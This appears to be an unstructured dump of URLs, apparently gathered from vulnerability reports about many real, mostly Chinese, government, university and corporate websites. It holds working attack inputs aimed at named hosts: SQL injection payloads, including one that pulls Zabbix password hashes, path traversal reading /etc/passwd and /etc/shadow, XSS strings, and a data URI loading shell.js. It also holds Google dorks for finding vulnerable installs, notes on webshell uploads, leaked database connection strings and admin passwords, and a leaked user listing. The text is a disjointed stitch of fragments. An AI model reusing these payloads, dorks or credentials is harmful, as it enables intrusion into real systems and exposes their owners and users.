http://218.64.81.15/mspowerwgi/web/Prog-info.action http://218.64.81.15/mspowerwgi/web/Index-index.action http://218.64.81.15/mspowerwgi/web/Index-indexForOut.action http://218.64.81.15/mspowerwgi/style.jsp http://61.175.197.98/login.html http://61.175.197.101/XT_Login/ https://code.csdn.net/keys http://www.sz-ss.net/Advantage/anlizhanshi/ http://www.999star.com/ http://pc.mmb.cn/wap/pc/index.jsp http://219.141.157.7/index.php?m=user&a=login http://home.ciwong.com/ http://i.ciwong.com/用户ID http://122.224.174.180/ http://ccr.bnu.edu.cn/viewstunews.php?id=56 http://www.weimob.com/tg/manager/user/UserExport/mobile//aid/49 http://www.weimob.com/tg/manager/order/detailPage/order_id/17280 http://www.weimob.com/tg/manager/order/indexPage/aid/49 http://222.189.228.200:8080/ http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.ncbhcwl.com/newscon.asp?big=6&id=558 http://reprod.njmu.edu.cn/hspd/proteinview.py?pro=IPI00022774 inurl:application/zwdt post:keyword= http://www.lzxzsp.gov.cn http://www.lzxzsp.gov.cn/application/zwdt/query.jsp http://www.lzxzsp.gov.cn/application/zwdt/query.jsp http://www.cqwsxzfw.com/ http://www.cqwsxzfw.com/application/zwdt/query.jsp http://www.cqwsxzfw.com/application/zwdt/query.jsp http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://web6.sydxbj.com/newslist.asp?big=6 http://www.synl.ac.cn/cg_content.asp?id=87 http://www.synl.ac.cn/cg_content.asp?id=87+and+1=1 http://www.synl.ac.cn/cg_content.asp?id=87+and+1=2 http://oa.ubox.cn/seeyon/management/status.jsp http://urp.nankai.edu.cn/personalInfo/photo?id=MTEyMDEwMDE2Mg== http://58.213.145.38/fckEditor/editor/filemanager/connectors/test.html http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.sytq.net/procon.asp?big=17&id=37 http://www.jscity.net/phpmyadmin http://www.bhcwl.com/ http://www.syyxbj.com/ http://www.lnhfrc.com/ http://www.spring0416.com/ http://www.shiyedianji.com/ http://www.syhqgs.cn/ http://www.syjihong.com/ http://www.dfcbaby888.com/ http://sytq.net/en/ http://www.sydbl.com/ http://syrixing.com/ http://www.lneca.cn/ http://shiyedianji.com/ http://www.syperfect.com/ http://sytq.net/ http://www.syrixing.com/ http://www.sytq.net/prolist.asp?big=56 http://www.jigang.com.cn/main/fabu/s_002.jsp?id=21684 http://www.lianping.gov.cn/sofpro/gecs/consulmanage/dgzt_consul_detail2.jsp?consult_seq=260&type=4 http://www.lianping.gov.cn/sofpro/ge http://sqlmap.org http://www.ctrip.com/member/confirm.asp?uid=10000&spec=890294 http://www.ctrip.com/member/confirm.asp?uid=_1&spec=890294 http://www.archives.sdu.edu.cn/publish/downloadForPublish.do?filePath=../../../../../../../../../../etc/passwd http://www.cbs.sdu.edu.cn//2009/daohangarticle.php?id=20/**/AND/**/447=448 http://www.xanet.cc/ inurl:index.php?m=Index” http://www.sxnjd.com/index.php?m=Index&a=lists&catid=74 http://www.shengsang.com/index.php?m=Index&a=shows&catid=97&id=141 http://www.sxxfj.com/index.php?m=Index&a=shows&catid=20&id=229 http://www.yyldb.com/index.php?m=Index&a=shows&catid=103&id=182 http://www.xasitan.com/index.php?m=Index&a=lists&catid=74 http://www.xahqzd.com/index.php?m=Index&a=lists&catid=94 http://www.xiaoyangkaorou.com/index.php?m=Index&a=shows&catid=113&id=460 http://www.yaxiushop.com/index.php?m=Index&a=lists&catid=94 www.iecworld.com inurl:web_list_result.jsp?questionnaire_id= http://xfb.lianping.gov.cn/sofpro/gecs/questionnaire/index_list_other.jsp?questionnaire_id=3 http://xfb.lianping.gov.cn/sofpro/gecs/questionnaire/web_list_result.jsp?questionnaire_id=3 http://lianping.gov.cn/sofpro/gecs/questionnaire/web_list_result.jsp?questionnaire_id=3 http://lianping.gov.cn/sofpro/gecs/questionnaire/index_list_other.jsp?questionnaire_id=3 http://www.ezhou.gov.cn/ http://www.ezhou.gov.cn/upimages/file/jm.asp http://www.95598.cn/person/index.shtml http://113.204.136.84/ http://113.204.136.84/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29 http://zyhjxy.scau.edu.cn/special/10junxun//admin/FCKeditor/editor/filemanager/connectors/test.html# http://ee.xjtu.edu.cn/eecjob/showjobfind.php?id=1 http://www.weimob.com/Wealbums/Editalbums/aid/330946/abid/151032 http://www.weimob.com/Wealbums/Editalbums/aid/330946/abid/15103 http://www.weimob.com/Wealbums/Editalbums/aid/330946/abid/151 http://branch.gdpu.edu.cn/huli/test//admin/FCKeditor/editor/filemanager/connectors/test.html# http://www.lnsme.gov.cn/lncms/wooyun.txt https://github.com/gayayzy/fdd-web/blob/master/fdd-web/config/common.php ssl://smtp.exmail.qq.com http://bbs.ickey.cn/ http://bbs.ickey.cn/user-login.html http://wooyun.org/bugs/wooyun-2010-053280 http://www.ynf.gov.cn/ http://bbs.ickey.cn/ http://bbs.ickey.cn/user-register.html http://common.hao123.com/comment/yingshizhuanti_tieba/list?item_id=1410770944&page=2 http://www.hao123.com/topic/wqa http://e.nuaa.edu.cn/ http://e.nuaa.edu.cn/hsxt/gsan1.jsp http://121.14.4.178/portal/framework/jsp/error/error.jsp(已被删) http://121.14.4.151:88/ui/js/error.jsp(已被删) jdbc:mysql://10.2.31.254:3306/bss_xinnet?user=xbss&password=xbss#E$R%T jdbc:jtds:sqlserver://10.2.24.241:1433;databaseName=XIN_ICPInfomation;user=sa;password=123456 user:password@host xinnetowner:buzwax2vnnvb#uathx77sfszksYmsd@10.2.24.95 user:password@host xinnetowner:buzwax2vnnvb#uathx77sfszksYmsd@10.2.24.96 http://www.v2tech.com/products/v2conf.jsp http://mail.chinaconveyor.com/Conf/jsp/main/mainAction.do http://www.hnsj1992.com.cn:18080/V2Conf/jsp/user/loginAction.do http://vc.transglobe.com.tw/V2Conf/jsp/user/loginAction.do http://sphys2.pdqmjt.net:18080/Conf/jsp/user/loginAction.do http://supe.com.cn:443/V2Conf/jsp/main/mainAction.do http://gdjsds.com:443/V2Conf/jsp/user/loginAction.do;jsessionid=3544C3E805F842C9A83D4EB011629344 http://baodai.cn/Conf/jsp/user/loginAction.do http://220.178.74.178:8080/Conf/jsp/main/mainAction.do http://110.52.144.22:18080/V2Conf/jsp/user/loginAction.do http://222.221.250.20:18181/V2Conf/jsp/user/loginAction.do http://221.232.141.109/FCKeditor/editor/filemanager/connectors/uploadtest.html https://gouser.3g.net.cn/userManage/login.jsp?systemid=76 https://password.3g.net.cn/iisadmpwd/aexp2.asp http://hi.blog.sina.com.cn/blog/caogen/admin_bole_add.php?dpc=1&qq-pf-to=pcqq.group http://about.ifensi.com/news_info.php?id=38194 http://group.ifensi.com/admin.php http://www.tzsbbm.com/index.php?at=r http://www.tzsbbm.com/userinfo/user.php?act=edit&id= http://www.sciclife.com http://www.sciclife.com/manage/coffeesafe.jsp www.xxx.com/admin,demo地址:http://ktv.cms.bookinge.com/admin http://61.145.124.30:8080/ http://nf.shnap.net.cn/ http://oa.aqtc.edu.cn/jmx-console/ http://application.dodopal.com:9997/jmx-console/ http://221.226.86.248/login.action www.ycpai.com URL:http://112.64.239.234/C6/Jhsoft.Web.login/PassWord.aspx http://112.64.239.234/C6/Jhsoft.Web.login/GetPassWord.aspx?flag=getEmail&Username=test http://g.qq.com/admin/ http://www.artword323.com http://www.wordtech.net http://www.yjbys.com/company/1229266.html http://ybtv.artword323.com:8012/login.aspx http://www.lzgzw.gov.cn/asp/1xx.asp?ID=10242 http://www.strongsoft.net/ http://www.mirapoint.com.cn/ http://www.nhfpc.gov.cn/fronttree/fronttree/getManuscriptsByChannelId_FrontTree.action(为什么会是这?因为web.xml里filter过滤的action指向没有防御二级或者三级目录) http://jwxt.tzpc.edu.cn/qmkscx_reg.asp http://jwgl.jhu.cn/qmkscx_reg.asp http://szitu.cn:86/qmkscx_reg.asp http://222.187.199.60/qmkscx_reg.asp http://jwcx.czie.net/qmkscx_reg.asp http://oadf114net.www.df114.net/login.php http://js.nclass.org/sc8/logon/userlogon.do http://livechat.dinodirect.com/ http://livechat.dinodirect.com/LiveChatServer/LiveChatMonitor.html?n=lujun&sln=jiankong&i=418&did=9&dname=%B1%B1%C3%C0%D2%BB%D7%E9&coid=1&pid=3&index=001001001&type=3&cgid=1 http://shop.youxinpai.com/Detail.aspx?serial=000048 http://ygxy.rsgis.whu.edu.cn/admin/user.add.php?userid=1&act=edit http://baike.gtxh.com/gtbk.aspx?mid=9c71fe4a9321440483adb38cd2ee8aca http://www.thegitc.com/index.php/home/index/getPersonnelDetailed?id=5 http://112.124 http://112.124 http://112.124 http://112.124 index.php/Admin/Home/ http://www.szjrwl.com/ inurl:product.asp?class= http://www.dongli-robot.com/product.asp?class=53&classname=%BB%FA%C6%F7%C8%CB%B4%FA%C0%ED%C5%E4%CC%D7%BC%B0%BC%BC%CA%F5%D6%A7%B3%D6 http://www.szhaolong.net/cn/product.asp?class=27&classname=%B2%BB%D0%E2%B8%D6%B6%DB%BB%AF%CF%B5%C1%D0 http://www.kexingsz.com.cn/product.asp?class=2&classname=+%B5%AF%BB%C9%CE%E5%BD%F0%CA%D4%D1%E9%BB%FA http://www.lulinternational.com/tw/product.asp?class=223&classname=IGBT+DC1200V http://www.hyilight.com/product.asp?class=7&classname=LED%20%C2%B7%20%B5%C6 http://www.coko-tech.com/cn/product.asp?class=79&classname=MICRO5PIN%C4%B8%D7%F9%D7%AA%BD%D3%CD%B7 http://www.honghengmp.com/cn/product.asp?class=9&classname=%B1%AD%B5%E6/%B4%C5%D0%D4%B1%F9%CF%E4%CC%F9 http://www.spdl68.com/product.asp?class=3&classname=%B1%DA%B9%D2%B5%E7%D4%B4%CF%B5%CD%B3&mn_id=6374 http://www.szbianse.com/cn/product.asp?class=21&classname=%D2%B9%B9%E2%B2%FA%C6%B7%D5%B9%CA%BE http://baisen.hk-web-2.szjrwl.com/cn/product.asp?class=29&key=&price1=&price2=&classname=%CC%EC%BB%A8%B5%C6&page=3§ion=1 http://www.cf-dz.com/product.asp?class=14&classname=VIMICRO%D6%D0%D0%C7%CE%A2 inurl:productshow.asp?id= http://www.coko-tech.com/cn/productshow.asp?id=112 http://www.kexingsz.com.cn/productshow.asp?id=407&mnid=6364&classname=+%CA%B3%C6%B7%C0%E0&uppage= http://www.dongli-robot.com/productshow.asp?id=131&mnid=6361&classname=%BB%FA%C6%F7%C8%CB%B4%FA%C0%ED%C5%E4%CC%D7%BC%B0%BC%BC%CA%F5%D6%A7%B3%D6 http://www.lulinternational.com/tw/productshow.asp?id=127 http://www.honghengmp.com/cn/productshow.asp?id=298 http://www.hyilight.com/productshow.asp?id=27&mnid=4869&classname=LED%CD%B6%B9%E2%B5%C6&uppage=product.asp http://www.spdl68.com/productshow.asp?id=67&mnid=6363&classname=%D6%D0%D1%EB%D0%C5%BA%C5%C6%C1 http://www.bjwj88.com/productshow.asp?id=3&mnid=4869&classname=%BA%CF%D2%B3&uppage=product.asp http://www.szbianse.com/cn/productshow.asp?id=38 http://www.cf-dz.com/productshow.asp?id=121 inurl:/gmis/ http://211.68.208.72/gmis_tjwgy/ http://yjsgl.zjtcm.net/gmis/ http://202.121.199.182:8080/gmis/ http://jcys.jxufe.cn:88/VJJxvw/liveAction.action admin:jcys2014 http://www.mastycp.com/List.asp?boardid=11 http://fjepca.com http://fjb.nea.gov.cn http://table.chinanews.com.cn/vote2008/view_results.php?si https://app.asana.com http://glxy.cuit.edu.cn/Databackup/wzws.asp http://api.91160.com http://125.39.130.18:28017/ http://www.gszlyy.com/detail.jsp?articleId=2175 http://www1.nepu.edu.cn/cg/login.aspx http://bbs.kuwo.cn/ http://gs.tju.edu.cn:80/yjspy/py2013/zy_list.asp?xydm=117 http://e.boc.cn/ehome/SQISOFT/web/webNew/nPromoteSaleSearch.aspx?goodType=1&sno=0001【注入点】&serchStr=【注入点】 http://e.boc.cn/ehome/SQISOFT/web/webNew/nPromoteSaleSearch.aspx?goodType=1&sno=0001&serchStr=%27+AND!%3d1+AND+%27a%27%3d%27a https://github.com/joybee007/acs/blob/42c709998b7655bbb22e1d6aa7ce8ce58ba453ac/service/mail.js http://wooyun.org/bugs/wooyun-2014-070878 http://www.ssbz.gov.cn/web/web_info_list.jsp?type=13&catalog=2 wyzx.ahu.edu.cn/list/page.jsp?id=ogf21ed9-jn06-fa5k-i703-b74hb35qmvqj&xxlx=10 http://www.jnrsks.gov.cn http://www.jnrsks.gov.cn/UpLoadFiles/Contents/ http://www.jnrsks.gov.cn/UpLoadFiles/Other/ http://www.threeoa.com/product/501.html www.jmsyz.net/eeoaftp/downloadFile.action www.zichang.sh.cn/eeoaftp/downloadFile.action www.sipras.net/eeoaftp/downloadFile.action www.mzlyz.cn/eeoaftp/downloadFile.action ssd3.31390.com/eeoaftp/downloadFile.action www.xiezhengyong.net/eeoaftp/downloadFile.action http://ejj.io/SOP.php http://threeoa.com/ inurl:space?blogId= http://www.threeoa.com/ http://www.hshsh.pudong-edu.sh.cn/ http://www.yk2z.ykedu.net/ http://www.zjyk2z.net/ http://58.217.106.249/ http://job.100tal.com/?systemjobtype=1 http://v.17173.com http://v.17173.com/u/118319704/playlist http://219.141.157.7/index.php/?a=get_all_phonenum&g=wap&itemid=10&keyword=0&m=item&order=price%20ASC&p=1&price=6&rule_id=1 http://219.141.157.7/?a=get_all_phonenum&g=wap&itemid=10&keyword=0&m=item&order=price%2520ASC%27%22%28%29%26%25%3CScRiPt%20%3Ealert%28%27xss%27%29%3C/ScRiPt%3E&p=1&price=6&rule_id=9 http://219.141.157.7/index.php?a=order_list&delivery_idcard=e%22%20onmouseover%3dprompt%281%29%20bad%3d%22&m=order&order=e www.anzhi.com http://www.chinaamc.com.hk/portal/web.rar http://yanchi.hncdst.cn/read.asp?id=303 http://yanchi.hncdst.cn/read.asp?dl=便民信箱&xl=&id=19 http://www.hnlxkjj.gov.cn/read.asp?id=1401 http://jskj.hncdst.cn/read.asp?id=1836 http://yanchi.hncdst.cn/read.asp?id=303 http://guantouzui.hncdst.cn/read.asp?id=73 http://weixin.hncdst.cn/read.asp?id=132 http://hupingshan.hncdst.cn/read.asp?id=790 http://www.hncdst.cn/read.asp?id=5716 http://longtanqiao.hncdst.cn/read.asp?id=138 http://cdcxy.hncdst.cn/read.asp?dl=%BF%C6%BC%BC%B3%C9%B9%FB&id=1834 http://dzj.hncdst.cn/read.asp?id=4507 http://wlkj.hncdst.cn/read.asp?id=1314 http://junshanpu.hncdst.cn/read.asp?id=73 http://junshanpu.hncdst.cn/read.asp?id=73 http://potou.hncdst.cn/read.asp?id=182 http://yazigang.hncdst.cn/read.asp?id=126 http://yougang.hncdst.cn/read.asp?id=120 http://datongshan.hncdst.cn/read.asp?id=76 http://cuijiaqiao.hncdst.cn/read.asp?id=309 http://sansheng.hncdst.cn/read.asp?id=64 http://xinxing.hncdst.cn/read.asp?id=117 http://moshi.hncdst.cn/read.asp?id=105 http://hncdst.cn/read.asp?id=5147 http://jiashan.hncdst.cn/read.asp?id=579 http://cdgxw.hncdst.cn/main/read.asp?id=2992 http://yijiadu.hncdst.cn/read.asp?id=21 http://baiyunshan.hncdst.cn/read.asp?id=186 http://zaoshi.hncdst.cn/read.asp?id=161 http://12396.hntyst.gov.cn/read.asp?id=1174 http://hupingshan.hncdst.cn/read.asp?id=160 http://www.haitiansoft.com:8080/ http://ip/cgi-bin/webif/Objset-users.sh?edituser=edituser&id=5,我们将id=5改为id=4,然后访问,就会到telecomadmin这个用户的管理界面,然后查看网页的源代码就会看到telecomadmin的密码了,重新用telecomadmin登录,就可以完全控制网关了。 http://demo.doctorcom.com/DrcomManager/download.jsp?filename=&filepath=/etc/shadow http://www.bzgh.gov.cn/disp.asp?id=2023 http://www.tjsfj.gov.cn/disp.asp?id=1936 http://www.bzdpf.org.cn/disp.asp?id=927 http://www.njsf.gov.cn/disp.asp?id=1237 http://njrsj.gotoip55.com/disp.asp?id=348 http://www.bzcjda.com/disp.asp?id=473 http://www.bsfxedu.com/disp.asp?id=341 http://bzqggzy.com/disp.asp?ID=619 http://www.bzqgt.gov.cn/disp.asp?id=4603 http://www.bzdpf.org.cn/disp.asp?ID=954 http://www.njgtzy.gov.cn/disp.asp?id=2780 http://www.bzsbj.gov.cn/disp.asp?id=1971 http://www.tjsfj.gov.cn/disp.asp?id=1874 http://sicav.chinaamc.com/admin_login.php http://shy.hpe.sh.cn https://drpaper.com.tw:10000/session_login.cgi http://74.125.227.77/#q=inurl:/session_login.cgi+++YouCloud+Mail&filter=0 http://mail.chinaums.com/cgi-bin/madmin.cgi https://gateway2.unionpay.com/cgi-bin/madmin.cgi https://mail.unionpay.com/cgi-bin/madmin.cgi http://mail.chinapay.com/cgi-bin/madmin.cgi ip:218.80.244.37) http://mail.cscb.cn/cgi-bin/madmin.cgi http://smkxxy.lcu.edu.cn/yanjiusheng/Admin/ad_index.html http://mail.bankofshanghai.com/cgi-bin/madmin.cgi http://www.ningzhi.net/nzcms/ http://www.hlwangkui.gov.cn/nzcms_show_news.asp?id=5740 http://www.lndz.com.cn/nzcms_show_news.asp?id=643 http://www.landwz.gov.cn/nzcms_show_news.asp?id=914 http://www.smlgbj.gov.cn/nzcms_show_news.asp?id=5436 http://www.lhtb.gov.cn/nzcms_show_news.asp?id=5894 http://www.sqsczx.com/nzcms_show_news.asp?id=59 http://video.ncu.edu.cn/nzcms_show_news.asp?id=4524 http://gjsw.hntbc.edu.cn/tx/nzcms_show_news.asp?id=3151 http://218.64.56.26/nzcms_show_news.asp?id=4554 http://61.190.13.55/nzcms_show_news.asp?id=5772 http://www.hlwangkui.gov.cn/nzcms_show_news.asp?id=7206 http://www.jnspzx-sd.gov.cn/ http://www.jnspzx-sd.gov.cn/site/Article_Classj.asp?ClassID=23 http://xy.sdkd.net.cn/xsdrs/ www.jlgrm.com,网站的标题是:华中师范大学外国语学院,校园网太渣,没能打开华师官网二级域名的那个外国语学院的网站,这网站应该不是仿冒的吧? http://www.ningzhi.net/nzcms/ http://www.lzsf.gov.cn/nzcms_list_news.asp?id=14&sort_id=13 http://www.landwz.gov.cn/nzcms_list_news.asp?id=818&sort_id=812 http://www.lhtb.gov.cn/nzcms_list_news.asp?id=622&sort_id=621 http://www.ycjtj.gov.cn/nzcms_list_news.asp?id=667&sort_id=656 http://www.qmsl.gov.cn/nzcms_list_news.asp?id=699&sort_id=663 http://www.hlwangkui.gov.cn/nzcms_list_news.asp?id=755&sort_id=663 http://www.snzhenba.jcy.gov.cn/nzcms_list_news.asp?id=692&sort_id=660 http://hgedu.gov.cn/nzcms_list_news.asp?id=716&sort_id=658 http://www.sqsczx.com/nzcms_list_news.asp?id=685&sort_id=720 http://www.jzgqt.org/nzcms_list_news.asp?id=699&sort_id=663 http://lpxtw.a224.xunbiz.net/nzcms_list_news.asp?id=697&sort_id=662 http://ggw.zjsm.com/nzcms_list_news.asp?id=674&sort_id=658 http://www.czzcb.cn/nzcms_list_news.asp?id=754&sort_id=638 http://www.dmxjyw.com/nzcms_list_news.asp?id=665&sort_id=656 http://tw.cztgi.edu.cn/nzcms_list_news.asp?id=706&sort_id=662 http://hbbxzx.com/nzcms_list_news.asp?id=680&sort_id=678 http://www.wuhanbt.com.cn/whbt/nzcms_list_news.asp?typeid=4&id=6 http://www.bit-school.com/nzcms_list_news.asp?id=675&sort_id=658 http://www.dmxjyw.com/nzcms_list_news.asp?id=665&sort_id=656 http://www.czjccw.com/nzcms_list_news.asp?id=820&sort_id=818 http://www.gdmarketing.cn/nzcms_list_news.asp?id=713&sort_id=656 http://218.25.119.234:8888/oa/nzcms_list_news.asp?id=823&sort_id=821 http://www.xjgzd.com/nzcms_list_news.asp?id=710&sort_id=709 http://www.qmsl.gov.cn/nzcms_list_news.asp?id=699&sort_id=663 http://www.9ask.cn/ data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3NpdGUuY29tL3NoZWxsLmpzPjwvc2NyaXB0Pg== http://site.com/shell.js http://support.zte.com.cn/long.txt https://gisftp.lenovo.com/ wistronpic:x:920:100:Linux liujf1:x:527:100:Linux lizhia-01:x:541:100:Linux dinggang-preload-r:x:682:100:Linux jingxiang:x:956:100:Linux wistronbj:x:921:100:Linux wangam:x:904:100:Linux chensf1:x:1000:100:Linux lenovo-perf:x:1016:100:Linux software-dev-1:x:804:100:Linux software-dev-2:x:805:100:Linux software-dev-3:x:806:100:Linux software-dev-4:x:807:100:Linux software-dev-5:x:808:100:Linux software-dev-6:x:809:100:Linux yangjingj:x:572:100:Linux wangwei37:x:1008:100:Linux flex_hungary:x:876:100:Linux mujk:x:594:100:Linux liuming1:x:842:100:Linux zhaojing2-usi:x:879:100:Linux tt:x:734:100:Linux mayza-01:x:546:100:Linux ganly:x:596:100:Linux odm_zhougj1_1:x:977:100:Linux yangxfa:x:719:100:Linux shirl-r:x:792:100:Linux wangdb-r:x:732:100:Linux odm_zhougj1_2:x:978:100:Linux smi:x:969:100:Linux zhengsc:x:729:100:Linux jiazj-tpv:x:697:100:Linux liuming:x:581:100:Linux cdwg:x:739:100:Linux liujff:x:695:100:Linux wudma:x:982:100:Linux http://cos.sto.cn/wui/theme/ecology7/page/login.jsp http://wooyun.org/bugs/wooyun-2010-049265 http://www.ahnu.edu.cn/site/gra/Administrator/Admin_Login.asp链接进去,直接显示源代码,如图 http://www.wanda.cn/index.php?m=special&c=index&a=microfilm_info&id=211 http://ejj.io/SOP.php貌似手机打不开了,没关系,我们把他源码弄下来本地测试: http://192.168.10.70/SupeSite7.5_SC_UTF8/upload//admincp.php?action=database&op=importstart&do=import&datafile=./backup_OpVKpM/140928_0Idz28GO-1.sql https://eshop.htc.com/webapp/wcs/stores/servlet/OrderDetail?catalogId=10001&langId=-7&orderId=1755842&storeId=10001&orderStatusCode=C http://history.ynnu.edu.cn/phpMyAdmin/libraries/ http://history.ynnu.edu.cn/phpMyAdmin/ http://sics.ynnu.edu.cn/studylist.aspx?id=345 http://vod.ynnu.edu.cn/link.aspx?id=1 http://brewmp.sina.cn/index.php/reg/confirm http://ask.zhidao.189.cn/ URL:GET http://www.zj.10086.cn/4gcard/ http://news.cga.com.cn/app/list.aspx?ItemId=13&categoryid=4 http://www.trip8080.com/login/verifyLoginc.jspx?callback=showUserInfo&t=1411895477588&callback=jsonpcallback665 http://cduestc.cn/newgt/index.asp http://www.wajy.net/Login.action http://www.ttyoa.com/OA/RenLiZiYuan/HeTong/HeTong.jsp?nCurPage=1&OrderBy=HeTongMingCheng&HeTongMingCheng_CX=%A1%AF&ZhengJianBianHao_CX= http://www.ttyoa.com/OA/3g_CaiWuGuanLi/ZhiChu/Main.jsp http://www.ttyoa.com/OA/3g_LianXiRen/Main.jsp view-source:http://www.ttyoa.com/OA/3g_LianXiRen/Main.jsp http://www.ttyoa.com/OA/3g_CaiWuGuanLi/ZhiC http://www.ttyoa.com/OA/3g_Che/LB.jsp?nCurP http://www.ttyoa.com/Common/Js/UploadEx/do_download.jsp?UpLoadPath=DB&FileName=Upload_2014-09-28-0-26-30_wooyun.jsp http://www.ttyoa.com/DB/pload_2014-09-28-0-26-30_wooyun.jsp http://www.ttyoa.com/DB/Upload_2014-09-28-0-28-18_css.jsp http://www.swrmyy.com/WJ_pyzfhfzl/admin/login.asp admin:admin888 http://www.travel.citic.com/shipList.jsp?shipid=1660 https://wen.lu/search?site=&source=hp&q=%E2%80%9C%E4%B8%8B%E8%BD%BD%E8%BA%AB%E4%BB%BD%E8%AF%81%E8%AF%BB%E5%8D%A1%E5%99%A8%E5%AE%89%E8%A3%85%E5%8C%85%E2%80%9D&btnK=Google+%E6%90%9C%E7%B4%A2&gws_rd=ssl http://puglin.yy.gov.cn http://sport.uestc.edu.cn/case_show.asp?case_id=99 http://sport.uestc.edu.cn/admin/ewebeditor/admin_login.asp http://sport.uestc.edu.cn/admin/ewebeditor/db/ewebeditor.mdb http://gk.ytu.edu.cn/ http://58.214.27.195/Search/result.jsp http://www.xishan.net/Search/result.jsp http://mhzx.mhedu.sh.cn/mhzx/Search/result.jsp http://oa.dhssx.com/Search/result.jsp http://222.190.122.226:2080/webschool/Search/result.jsp http://www.whjksyxx.com/Search/result.jsp http://www.wxzzyey.com www.wxzzyey.com http://www.wxzzyey.com BSoftNew.svc/Login?username=156...省略...6&DevID=8...省略...0&OS=2&logintype=2&DevType=GT-I9128E&ClientVer=1.2.2&password=p...省略...5&DevVer=4.2.2 BSoftNew.svc/UpdatePatientInfo?token=...省略...&personid=9...省略...2&userid=2...省略...8&DevID=8...省略...0&OS=2&isUpdateUserInfo=true&DevType=GT-I9128E&ClientVer...省略 BSoftNew.svc/UpdatePatientInfo?token=...省略...&personid=9...省略...2&userid=2...省略...5&DevID=8...省略...0&OS=2&isUpdateUserInfo=true&DevType=GT-I9128E&ClientVer=1.2.2&password=wooyun&DevVer=4.2.2...省略 https://wx.abchina.com/WXMessage/DebitBindingCardAct.ebf?openId=otDNot61p8xtIsYTTPX6Smr_tBwE http://dg.wowostar.com/ http://dg.wowostar.com/company.sql http://dg.wowostar.com/company_cms/ https://eshop.htc.com/webapp/wcs/stores/servlet/OrderDetail?catalogId=10001&langId=-7&orderId=******&storeId=10001&orderStatusCode=C http://cnc.025journal.com/Web/CommonPage.aspx?Id=1 http://seie.xhu.edu.cn http://ysxb.bcu.edu.cn:81/ys_website/ys_zsjy/ys_zsjy_index.php?id=5 http://ysxb.bcu.edu.cn:81/phpmyadmin/ http://xyb.cupl.edu.cn/Alumni_news.aspx?id=329 http://www1.deyang.gov.cn/fgw-new/TopicOneListPage.aspx?TopicID=1 inurl:web/indexmore.asp?leibie= http://www.gzysx.com:80/sx/web/web/web/indexmore.asp?leibie=%CA%B5%D1%E9%CA%B5%D1%B5%CA%D2%BC%F2%BD%E9 http://220.178.213.189/web/web/web/indexmore.asp?leibie=%B9%AB%B8%E6 http://www.gxevc.com:10333/web/web/web/indexmore.asp?leibie=%B9%AB%CE%C4%B7%A2%CB%CD http://125.67.64.233:81/web/web/web/indexmore.asp?leibie=%D0%C2%CE%C5%B1%A8%B5%C0 http://218.89.109.22/web/web/web/indexmore.asp?leibie=%CD%A8%D6%AA%B9%AB%B8%E6 http://www.xxoo.com/ckeditor/imageupload/tupianadd1.asp http://pinggu.hnfnu.edu.cn/list.php?id=3 http://www.xtfda.gov.cn/mm/newscodejs.asp?lm2=172 http://midh.cneln.net/eln3_asp/index.do http://www.gyey.com/cn/BYysxxCX.aspx?id1=1&id2=1&id3=1 http://ask.zhidao.189.cn/ http://121.15.172.116/bbs.zip https://github.com/somli/gen-tables/blob/40904ce079b51442651964eeea6106c9ee40f121/env/development.php URL:http://it.11185.cn/chinapostintegrate/mailqueries.a https://wen.lu/search?site=&source=hp&q=%E2%80%9C%E4%B8%8B%E8%BD%BD%E8%BA%AB%E4%BB%BD%E8%AF%81%E8%AF%BB%E5%8D%A1%E5%99%A8%E5%AE%89%E8%A3%85%E5%8C%85%E2%80%9D&btnK=Google+%E6%90%9C%E7%B4%A2&gws_rd=ssl http://www.cfgc.com.cn/hy_index/notify.asp?password=&chknum=&Radiochk=%CA%C7&Radiochk=%B7%F1&UKeySerial=&Digest=&SN_SERAL=&username=1* http://www.cfgc.com.cn/hy_index/notify.asp?pass http://jifen.jiajiaoban.com/admin/users/login http://zwfw.jiangxi.gov.cn:9080/online/sysmng/xxoo.jsp http://payonline.qcn.com.cn/UI/business/suggest/suggestdetail.jsp?id=561 http://m.ch999.com/productxinde.aspx?ppid=24019&proid=99999999 http://cupdate.client.189.cn/client.tar.gz http://jipiao.11185.cn/news/newsid!NewsById.a http://diy.11185.cn/DIYMXP/system/MMZH.do http://movie.11185.cn/index.a http://shop.tcl.com/mall/goods/index.html?cat_id=20&attrs_51=515 http://gd.10086.cn/shadu/)。上一个sql漏洞发现之前在 http://gd.10086.cn/shadu/kvweb/help/askQuestion.jsp http://120.197.231.114:8070/shaduhoutai/login.jsp http://daq.cn/html/user/register.html http://211.151.82.170/page.asp?typeid=1&id=18 inurl:ch/first_menu.aspx http://jse.tju.edu.cn/ch/reader/query_recent_article_list.aspx http://www.cssm.com.cn/ch/reader/query_recent_article_list.aspx http://www.joconline.com.cn/ch/reader/query_recent_article_list.aspx http://webvote.hangzhou.com.cn/mx/bm.php未做任何过滤直接上传PHP马 www.daoxila.com http://www.zjtj.org/zt_list.aspx?id=3&page=1 http://www.zjtj.org/hits.ashx?id=2441 http://qd.daoxila.com/hotel/all-image?id=1201 